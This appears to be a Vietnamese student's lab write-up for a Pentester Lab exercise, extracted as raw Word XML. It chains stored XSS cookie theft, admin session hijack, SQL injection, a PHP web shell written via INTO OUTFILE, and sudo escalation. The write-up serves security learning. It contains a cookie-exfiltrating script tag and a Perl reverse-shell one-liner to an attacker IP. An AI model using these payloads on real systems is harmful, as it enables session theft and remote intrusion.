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Lab4: Pentester Lab: XSS và MySQL FILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Độ khó:Người mới bắt đầu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Chi tiết: Bài tập này giải thích cách bạn có thể sử dụng lỗ hổng Cross-Site Scripting để truy cập vào cookie của quản trị viên. Sau đó, cách bạn có thể sử dụng phiên của người đó để truy cập vào quản trị để tìm ra lỗi SQL injection và thực thi mã bằng cách sử dụng lỗi đó.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng nmap để tìm kiêm địa chỉ của máy lab và các dịch vụ của nó</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3080385"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="211808400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510" cy="308038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Kết quả trả về cho biết máy ảo có địa chỉ 10.10.10.139 cùng với dịch vụ ssh ở cổng 22, http ở cổng 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện đăng nhập vào web, nhận thấy đây là một blog có chức năng comment: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0" distT="0" distL="0" distR="0">
            <wp:extent cx="4277241" cy="2339069"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084004"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4277241" cy="2339069"/>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Thực hiện đưa vào thẻ &lt;h1&gt; và kết quả trả về có chứa chữ abc được in hoa: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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3018155"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="211808400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510" cy="301815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Thay đổi đầu vào bằng 1 thẻ img có khả năng thực thi javascript:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1847215"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084006"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731510" cy="184721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Cửa sổ pop-up tương ứng với lệnh alert đã được kích hoạt:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2716530"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084005"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5731510" cy="271653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Khởi động burp collaborator để tạo một miền để lắng nghe các request đến:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2237105"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084008"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31510" cy="223710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Thực hiện đưa vào comment lệnh có chức năng gửi request đến miền của cta với cookie của người dùng khi truy cập vào blog chứa đoạn mã độc này:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;document.write('&lt;img src="http://malicious/?'+document.cookie+'"/&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau một thời gian chờ đợi, thu được 2 cookie, 1 cái là của bản thân và 1 cái là của tài khoản khác:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1758315"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084007"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31510" cy="175831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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1355725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084012"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731510" cy="13557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Đưa cookie của tài khoản khác vào cookie editor để thay đổi cookie của bản thân thành của họ:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3620135"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084010"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5731510" cy="362013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Sau khi thay đổi thành công, click vào mục admin và truy cập được vào giao diện admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1409065"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084016"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731510" cy="140906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Truy cập vào chức năng edit blog, ở tham số id thêm kí tự ‘ vào và kết quả xuất hiện thông báo lỗi khi thực hiện truy vấ sql ko thành công</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1790065"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084013"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731510" cy="179006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Tiếp đó thứ đưa câu lệnh 0 or 1=1--# và 0 or 0=1--# thì thấy 1=1 có kết quả trả về còn 1=0 thì không, từ đây kết luận trang web có lỗ hổng sqli :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1771015"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084015"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5731510" cy="177101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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1991360"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084017"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5731510" cy="199136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Thực hiện tìm kiếm số cột của truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2796540"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084018"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731510" cy="279654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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2258060"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084019"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731510" cy="225806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Khi orderby 4 thì trang web vẫn chạy bình thường nhưng lhi lên 5 thì lại có thông báo lỗi, từ đây xác nhận rằng truy vấn hiện tại có 4 cột</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Đưa vào 4 cột 4 giá trị 1 2 3 4 để xác định xem 2 mục hiển thị tương ứng cột nào</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5280353" cy="2684052"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084020"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280353" cy="2684052"/>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Kết quả trả về cho thấy cột 2 và 3 sẽ hiển thị dữ liệu của truy vấn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp đến, để có thể thực thi rce thông qua sql, chúng ta sẽ sử dụng cơ chế đọc file và ghi file thông qua chức năng load_file và into outfile của sql. Thực hiện đọc file /etc/password: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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2818765"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084021"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5731510" cy="281876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Dựa vào thông báo lỗi từ trên, cta đã biết file php tương ứng với phần edit blog này nằm trong thư mục /var/www/classes, vì vậy thử tạo một file mới trong thư mục này với nội dung là 1 2 3 4 tương ứng với giá trị 4 cột trong câu truy vấn này:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1830070"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084022"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731510" cy="183007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Tuy nhiên, khi truy cập vào đường dẫn theo file đã tạo thì thì kết quả trả về là ko tìm thấy, vì vậy ko thể thực thi ghi file mới vào trong thư mục này.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2640330"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084023"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5731510" cy="264033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Kiểm tra thông tin về trang web thì ngoài thư mục classes ra thì vẫn còn các thư mục khác như css và admin, ở đây tớ sẽ chọn css:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3486637" cy="1876687"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084024"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3486637" cy="1876687"/>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Thực hiện ghi file mới trong thư mục css:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="2551430"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="211808399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731510" cy="255143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Kết quả cho thấy file đã tạo thành công và có nội dung 1 2 3 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5601482" cy="2010056"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083993"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601482" cy="201005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Thay 1 cột bằng 1 thẻ php có khả năng thực thi các cậu lệnh của hệ thống:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1946275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083994"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731510" cy="194627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Gửi file lên thành công và đã thực thi đc câu lệnh id :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1426210"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083995"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731510" cy="142621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Tiếp đến để thực hiện reverse shell, đưa vào câu lệnh dưới đây:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.128:4242");STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="825500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083996"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73151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Ở máy kali mở netcat để lắng nghe và đã truy cập đc vào shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1892935"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083997"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731510" cy="189293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Đọc file /etc/password thấy trong tài khoản user có Debian live user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4525006" cy="181000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083998"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4525006" cy="181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Tra gg và thấy có thể sử dụng mật khẩu live để đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1597025"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118083999"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731510" cy="15970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Thử ssh vào user với password live và thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1500505"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084000"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5731510" cy="150050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0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="1142365"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084001"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5731510" cy="114236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Sử dụng lệnh sudo -v để thử xác thực sudo. Khi chạy lệnh này, nó sẽ yêu cầu người dùng nhập mật khẩu của mình (nếu cần) và sau đó gia hạn thời gian quyền sudo của bạn mà không cần thực hiện một lệnh nào khác.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2838846" cy="362001"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084009"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2838846" cy="362001"/>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Thực thi và thấy ko bị yêu cầu nhập mật khẩu, điều này chứng tỏ là có thể thực thi sudo một cách tùy ý.Dùng sudo bash để gọi bash dưới quyền root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4296375" cy="638264"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084011"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4296375" cy="638264"/>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Bonus: Lí do thực thi đc sudo ko cần mật khẩu: Ở dòng cuối trong ảnh có đoạn user  ALL=(ALL) NOPASSWD: ALL cho phép tài khoản user chạy tất cả các lệnh sudo mà ko cần password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="3155950"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2118084014" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3155950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId4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semiHidden w:val="1"/>
    <w:rsid w:val="00964313"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:color w:val="2f5496" w:themeColor="accent1" w:themeShade="0000BF"/>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19.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId23"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30.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.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6.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" 